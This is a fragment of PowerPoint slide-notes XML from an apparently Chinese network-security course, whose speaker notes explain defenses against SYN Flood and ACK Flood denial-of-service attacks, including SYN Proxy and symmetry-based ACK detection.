            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="992188" y="768350"/>
            <a:ext cx="5114925" cy="3836988"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151556" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6182656F-5129-4FCB-981E-6CF32D0DC4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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC4C670B-7394-4ABF-A864-836C98CED073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161795" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E40411F-7A17-48CD-9870-FDB9BF6AB2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796" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437BADB9-9B96-40BF-9363-400B5A2BCEF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E04475A-5B2B-480E-8A13-1BCE1AAC4FC8}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>110</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C91B08C-ABC9-4FA8-8EFC-B963A2982C70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163843" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53964321-F59C-4E53-AAE0-E538F8AC23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4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{533A9206-BFDD-4753-B76E-B1A2C5DDB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5678B370-F050-400B-B489-14AF99557CD1}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>111</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8255E067-67EB-4EFF-9BD5-58C412247DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168963" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F7E42F1-DAFE-44C5-9777-117AA0C9E52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熊猫烧香病毒特征码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168964" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C16A4CC-1F53-4036-9073-733747106CC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CAC47295-9CFE-4BDD-A8CB-604B02A9AC9A}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>115</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2627367F-7439-4EFC-8658-8FE31A3EE3BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171011" name="备注占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB36ECA4-800C-48E8-B39B-6C979D08DD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熊猫烧香病毒特征码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171012" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA70872B-2629-4AAE-85A8-54DD6FA6A1A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ABDD91FF-1356-4119-AC60-C1889B5E4A50}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1300" smtClean="0"/>
              <a:pPr/>
              <a:t>116</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="13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A23D9C3A-C810-47B0-92FF-16A5C9C33C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144588" y="685800"/>
            <a:ext cx="4570412" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192515" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2C9DAE5-6039-40D8-B565-D338F71F5272}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1552575"/>
            <a:ext cx="8686800" cy="4527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SYN Flood:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>完备的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>；这种方法在攻击流量较大的时候，连接出现较大的延迟，网络的负载较高，很多情况下反而成为整个网络的瓶颈；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2) Random Drop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>；随机丢包的方式虽然可以减轻服务器的负载，但是正常连接的成功率也会降低很多；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特征匹配；在攻击发生的当时统计攻击报文的特征，定义特征库；例如过滤不带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP Options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>syn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包等；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>丢弃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字节小报文；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据经验判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包头里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>值不合理的数据包。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>从这些方法分析来看，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>算法可以从理论上完全解决伪造源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击，只要对其进行改进，结合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信誉机制以及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HCF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>算法，就可以起到较好的防护效果。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防护算法在对一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接请求做反向探测时，连接请求发起端先和防拒绝服务系统建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>次握手，然后防拒绝服务系统模拟客户端向服务器发起连接请求，这样就把通常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接建立过程由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>次握手增加到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>次握手。而对于伪造源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包，由于无法和防拒绝服务系统建立前面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>次握手，该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包就不会到达服务器。 </a:t>
            </a:r>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BDC4BE23-9A84-4C9E-A975-698E55F83F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144588" y="685800"/>
            <a:ext cx="4570412" cy="3429000"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194563" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76CA7BD0-606F-48E0-B9AD-3CCAB27C90D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1552575"/>
            <a:ext cx="8686800" cy="4527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ACK Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>属于单包类型攻击，即用大量</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>小包进行冲击。按照我们对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>协议的理解，随机源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>小包应该会被</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>很快丢弃，因为在服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>堆栈中没有这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的状态信息。但是实际上通过测试，我们发现有一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务会对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比较敏感，比如说</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JSP Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，在数量并不多的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>小包的打击下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(10kpps)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JSP Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>就很难处理正常的连接请求。对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来说，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>10kpps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不构成危胁，但是更高数量的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会造成服务器网卡中断频率过高，负载过重而停止响应。可以肯定的是，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不但可以危害路由器等网络设备，而且对服务器上的应用有不小的影响。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过大量调查，发现正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包有一些基本统计特性：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(1) ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包在双向基本相等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有一个特例，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>FTP Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>passvie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>模式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(2) ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的大小及内容是随机的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在攻击发生的时候，统计特性会出现明显的变化：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>同一目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包在一侧大量突现，超过以该目的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的两倍以上。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(2) ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的大小及内容相对固定。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>因此，我们基本可以确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防护的算法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先利用对称性判断来分析出是否有攻击存在；在判断有攻击发生时，启用防护机制：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>三次握手的后续数据传输过程，如果不存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的三次握手，那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的突然出现肯定是非法的。基于这点，可以建立一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表，用来存放</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>连接“状态”，相对于主机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实现来说，状态检查的过程是相对简化，例如，不作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sequence number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的检查，不作包乱序的处理，只是统计一定时间内是否有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包在该“连接”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即四元组</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上通过，从而“大致”确定该“连接”是否是“活动的”。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
